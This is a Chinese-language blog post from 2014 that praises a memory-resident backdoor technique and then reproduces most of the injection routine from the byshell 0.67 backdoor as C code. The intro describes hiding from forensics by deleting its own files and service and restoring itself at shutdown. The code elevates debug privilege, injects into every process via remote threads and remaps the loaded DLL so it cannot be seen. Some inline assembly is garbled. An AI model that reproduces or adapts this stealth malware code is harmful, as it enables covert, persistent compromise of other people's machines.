一个不错的隐藏后门思路

发布时间：2014-04-28 12:39:47作者：知识屋

一个不错的思路隐藏后门，利用线程注射DLL到进程，解除DLL映射，并删除自身DLL和EXE文件，删除自身创建的服务，仅仅存在于内存中。于是在寄主机器上无法找到任何新增服务项，磁盘文件或者是进程空间里的不明DLL。关机时，该程序会截获关机的调用，在系统关闭之前恢复自己。缺点是不正常重启之后后门消失.....

以下代码引自byshell0.67，你可以从Xfocus上获取源代码（baiyuanfan大侠的作品撒～）一直没看过后门那些东西的，今天别人提到，没想到有这么不错的东西啊......

void injcode(){HANDLE prohandle;DWORD pid=0;int ret;int tmp;HANDLE fm; 

//SE_DEBUG_NAME 

 HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1; 

 LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; 

 AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0); 

//retrive pid from toolhelp32 

Sleep(1000); 

HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 

struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32); 

ret=(int)CreateMutex(0,0,"by067clean"); 

if(!ret){MessageBox(0,0,0,0);goto err1;} 

ret=(int)CreateMutex(0,0,"by067revive"); 

if(!ret){MessageBox(0,0,0,0);goto err1;} 

ret=(int)CreateEvent(0,0,1,"by067check");//初始status设置1！切记 

if(!ret){MessageBox(0,0,0,0);goto err1;} 

fm=CreateFileMapping((HANDLE)-1,0,PAGE_READWRITE,0,1024,"by067filemapping"); 

if(!fm){MessageBox(0,0,0,0);goto err1;} 

//filemapping权限要设置为任何人可读写 

PACL pdacl; 

PACL pnewdacl; 

PSECURITY_DESCRIPTOR psd; 

EXPLICIT_ACCESS ace; 

int ret1; 

GetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,&pdacl,0,&psd); 

ace.grfAccessPermissions=GENERIC_ALL; 

ace.grfAccessMode=GRANT_ACCESS; 

ace.grfInheritance=NO_INHERITANCE; 

ace.Trustee.pMultipleTrustee=0; 

ace.Trustee.MultipleTrusteeOperation=NO_MULTIPLE_TRUSTEE; 

ace.Trustee.TrusteeForm=TRUSTEE_IS_NAME; 

ace.Trustee.TrusteeType=TRUSTEE_IS_GROUP; 

ace.Trustee.ptstrName="EVERYONE"; 

SetEntriesInAcl(1,&ace,pdacl,&pnewdacl); 

ret1=SetSecurityInfo(fm,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pnewdacl,0); 

if(ret1){goto err2;} 

//char injexe[]="explorer.exe";//for dbg only process 

for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){ 

 //if(stricmp(processsnap.szExeFile,injexe)){continue;} 

 if(processsnap.th32ProcessID<10){continue;} 

 if(!stricmp(processsnap.szExeFile,MAINPROC1)){injapistr.ismainthread=1;} 

 else if(!stricmp(processsnap.szExeFile,MAINPROC2)){injapistr.ismainthread=2;} 

 else{injapistr.ismainthread=0;} 

 pid=processsnap.th32ProcessID; 



//inj 

prohandle=OpenProcess(PROCESS_ALL_ACCESS,1,pid); 

if(ReadProcessMemory(prohandle,(void*)0x19850000,&tmp,4,(DWORD*)&ret)==1){continue;} 

//已经装载了byshell一次？不做动作 

DWORD WINAPI injfunc(LPVOID); 

HMODULE hModule;LPVOID paramaddr; 

hModule=LoadLibrary("kernel32.dll"); 

injapistr.myLoadLibrary=(struct HINSTANCE__ *(__stdcall *)(const char *))GetProcAddress(hModule,"LoadLibraryA"); 

injapistr.myGetProcAddress=(FARPROC (__stdcall*)(HMODULE,LPCTSTR))GetProcAddress(hModule,"GetProcAddress"); 

injapistr.myVirtualAlloc=(void *(__stdcall *)(void *,unsigned long,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualAlloc"); 

injapistr.myFreeLibrary=(int (__stdcall *)(struct HINSTANCE__ *))GetProcAddress(hModule,"FreeLibrary"); 

injapistr.myIsBadReadPtr=(int (__stdcall *)(const void *,unsigned int))GetProcAddress(hModule,"IsBadReadPtr"); 

injapistr.myVirtualFree=(int (__stdcall *)(void *,unsigned long,unsigned long))GetProcAddress(hModule,"VirtualFree"); 

paramaddr=VirtualAllocEx(prohandle,0,sizeof(injapistr),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

ret=WriteProcessMemory(prohandle,paramaddr,&injapistr,sizeof(injapistr),0); 

void* injfuncaddr=VirtualAllocEx(prohandle,0,20000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

ret=WriteProcessMemory(prohandle,injfuncaddr,injfunc,20000,0); 

ret=(int)CreateRemoteThread(prohandle,0,0,(DWORD (WINAPI *)(void *))injfuncaddr,paramaddr,0,0); 

if(!ret){int tmp=GetLastError(); 

#ifdef bydbg 

OutputDebugString("cannot infect process:see pid in edx,err code in eaxn"); 

__asm mov eax,tmp 

__asm mov edx,pid 

__asm int 3; 

#endif 

} 

CloseHandle(prohandle); 



}//end for 





CloseHandle(snapshot); 

return; 



{ 

err1: 

#ifdef bydbg 

OutputDebugString("create global obj failedn"); 

__asm int 3; 

#endif 

return; 

} 

{ 

err2: 

#ifdef bydbg 

OutputDebugString("cannot set DACL of section,see err code in eaxn"); 

__asm mov eax,ret1 

__asm int 3; 

#endif 

return; 

} 

} 





DWORD WINAPI injfunc(LPVOID paramaddr){ 



char ntboot[16];char msgbox[16]; 

INJAPISTR * pinjapistr=(INJAPISTR *)paramaddr; 

__asm{ 

mov ntboot,’n’ 

mov ntboot 1,’t’ 

mov ntboot 2,’b’ 

mov ntboot 3,’o’ 

mov ntboot 4,’o’ 

mov ntboot 5,’t’ 

mov ntboot 6,’.’ 

mov ntboot 7,’d’ 

mov ntboot 8,’l’ 

mov ntboot 9,’l’ 

mov ntboot 10,0 



mov msgbox,’C’ 

mov msgbox 1,’m’ 

mov msgbox 2,’d’ 

mov msgbox 3,’S’ 

mov msgbox 4,’e’ 

mov msgbox 5,’r’ 

mov msgbox 6,’v’ 

mov msgbox 7,’i’ 

mov msgbox 8,’c’ 

mov msgbox 9,’e’ 

mov msgbox 10,0 

} 

HMODULE hModule=pinjapistr->myLoadLibrary(ntboot); 

if((int)hModule!=0x19850000){return 0;}//特殊情况 

DWORD (WINAPI *myCmdService)(LPVOID); 

myCmdService=(DWORD (WINAPI *)(LPVOID))(pinjapistr->myGetProcAddress(hModule,msgbox)); 



unsigned int memsize=0; 

void * tempdll=pinjapistr->myVirtualAlloc(0,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

memcpy(tempdll,hModule,DLLIMAGESIZE); 

pinjapistr->myFreeLibrary(hModule); 

hModule=(HMODULE)pinjapistr->myVirtualAlloc(hModule,DLLIMAGESIZE,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); 

memcpy(hModule,tempdll,DLLIMAGESIZE);pinjapistr->myVirtualFree(tempdll,DLLIMAGESIZE,MEM_DECOMMIT); 

// 



myCmdService((void*)(pinjapistr->ismainthread)); 

return 0; 



}

（免责声明：文章内容如涉及作品内容、版权和其它问题，请及时与我们联系，我们将在第一时间删除内容，文章内容仅供参考）